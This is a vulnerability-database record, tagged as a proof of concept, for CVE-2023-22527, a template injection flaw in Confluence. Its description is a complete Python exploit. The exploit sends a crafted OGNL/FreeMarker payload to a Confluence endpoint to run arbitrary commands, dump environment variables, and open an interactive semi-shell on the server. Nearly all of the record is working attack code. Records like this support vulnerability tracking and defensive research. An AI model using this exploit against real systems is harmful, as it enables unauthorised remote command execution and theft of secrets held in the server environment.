{"uuid": "a58dda1d-0763-4d89-ad38-22d86eb55d6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "title": "POC for CVE-2023-22527 (Confluence SSTI) - Struts2", "description": "~~~python\nimport requests\nimport argparse\n\nclass exploit:\n\tdef __init__(self, url):\n\t\tself.url = url\n\n\tdef rce(self, cmd='', header='Ret-rce'):\n\n\t\tdata = 'label=\\\\u0027%2b#request\\\\u005b\\\\u0027.KEY_velocity.struts2.context\\\\u0027\\\\u005d.internalGet(\\\\u0027ognl\\\\u0027).findValue(#parameter\ns.x,{})%2b\\\\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({\"'+cmd+'\"}))\\r\\\nn'\n\t\t\n\t\tr = requests.post(f'{self.url}/template/aui/text-inline.vm', data=data, headers = {\n\t\t\t    'Connection': 'close',\n\t\t\t    'Content-Type': 'application/x-www-form-urlencoded',\n\t\t\t    'Content-Length': str(len(data))\n\t\t\t}\n\t\t)\n\t\treturn r.text.split('<!DOCTYPE html>')[0].strip()\n\n\tdef get_env(self):\n\t\treturn self.rce(cmd='env')\n\n\tdef shell(self):\n\t\tprint('[DEBUG] Spawning semi-interactive shell ..')\n\t\twhile 1:\n\t\t\tcmd = input('$ ')\n\t\t\tresult = self.rce(cmd)\n\t\t\tprint(result)\n\n\n\ndef parse_args():\n\tparser = argparse.ArgumentParser(add_help=True, description='This is a POC for CVE-2023-22527 (Confluence SSTI)')\n\tparser.add_argument(\"-u\",dest=\"url\",type=str,required=False, help=\"Url\")\n\tparser.add_argument(\"-c\",dest=\"command\",type=str,required=False, default=None,help=\"Command\")\n\tparser.add_argument(\"-e\",dest=\"env\",action=\"store_true\",required=False,default=False, help=\"Get environnement vars\")\n\tparser.add_argument(\"-i\",dest=\"interactive\",action=\"store_true\",required=False,default=False, help=\"Interactive mod\")\n\treturn parser.parse_args()\n\ndef main(args):\n\tif args.command is None and not args.env and not args.interactive:\n\t\tprint('[ERROR] Please provide a command using -c option')\n\n\texp = exploit(url = args.url)\n\n\tif args.env:\n\t\tres = exp.get_env()\n\t\tprint(res)\n\n\tif args.command:\n\t\tres = exp.rce(args.command)\n\t\tprint(res)\n\n\tif args.interactive:\n\t\texp.shell()\n\nif __name__ == '__main__':\n\targs = parse_args()\n\tmain(args = args)\n\n~~~", "description_format": "markdown", "vulnerability": "CVE-2023-22527", "creation_timestamp": "2025-01-17T21:29:08.826577+00:00", "timestamp": "2025-01-17T21:29:08.826577+00:00", "related_vulnerabilities": ["CVE-2023-22527"], "meta": [{"tags": ["vulnerability:information=PoC"]}], "author": {"login": "adulau", "name": "Alexandre Dulaunoy", "uuid": "c933734a-9be8-4142-889e-26e95c752803"}}